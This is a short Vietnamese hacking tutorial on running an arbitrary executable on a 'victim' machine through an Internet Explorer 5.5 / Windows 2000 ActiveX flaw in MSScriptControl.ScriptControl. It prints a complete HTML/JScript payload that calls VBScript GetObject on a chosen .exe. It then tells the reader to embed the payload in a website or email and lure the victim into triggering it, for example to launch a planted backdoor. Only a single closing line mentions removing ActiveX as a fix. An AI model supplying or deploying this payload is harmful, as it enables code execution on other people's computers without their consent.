Chạy file trên máy của victim
Trang 1Chạy file trên máy của victim :
trang này đã được đọc lần
Giới thiệu :
Bạn đã cài được backdoor vào victim hay muốn chạy 1 file nào đó trên máy của victim ?
Trong khi visit website hay check mail thì bạn có thể chạy 1 file mà bạn biết , ví dụ : notepad.exe ngay trên Browser
Test trên IE 5.5 Windows 2000
Bug này là bug của ActiveX object "MSScriptControl.ScriptControl" bạn có thể xem thêm nhiều điều ở trong : C:\Documents and Settings\USERNAME\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Tiến hành
Chắc chắn rằng victim dùng IE 5.5 Windows 2000 !!:)
Tạo một file html có mã như sau :
<html>
<h2>
Noi dung website
</h2>
<script>
v=new ActiveXObject("MSScriptControl.ScriptControl.1");
v.Language="VBScript";
x=v.eval('GetObject("c:/ten_file_can_chay.exe(hay gi do')","htmlfile")');
setTimeout("alert(x.body.outerHTML);",2000);
</script>
</html>
Nhúng mã nguồn trên vào Website hay email, sau đó nhử cho victim kích hoạt
Ðể khắc phục bạn cần bỏ ActiveX đí hay tốt nhất là không dùng IE nữa (ý kiến hay)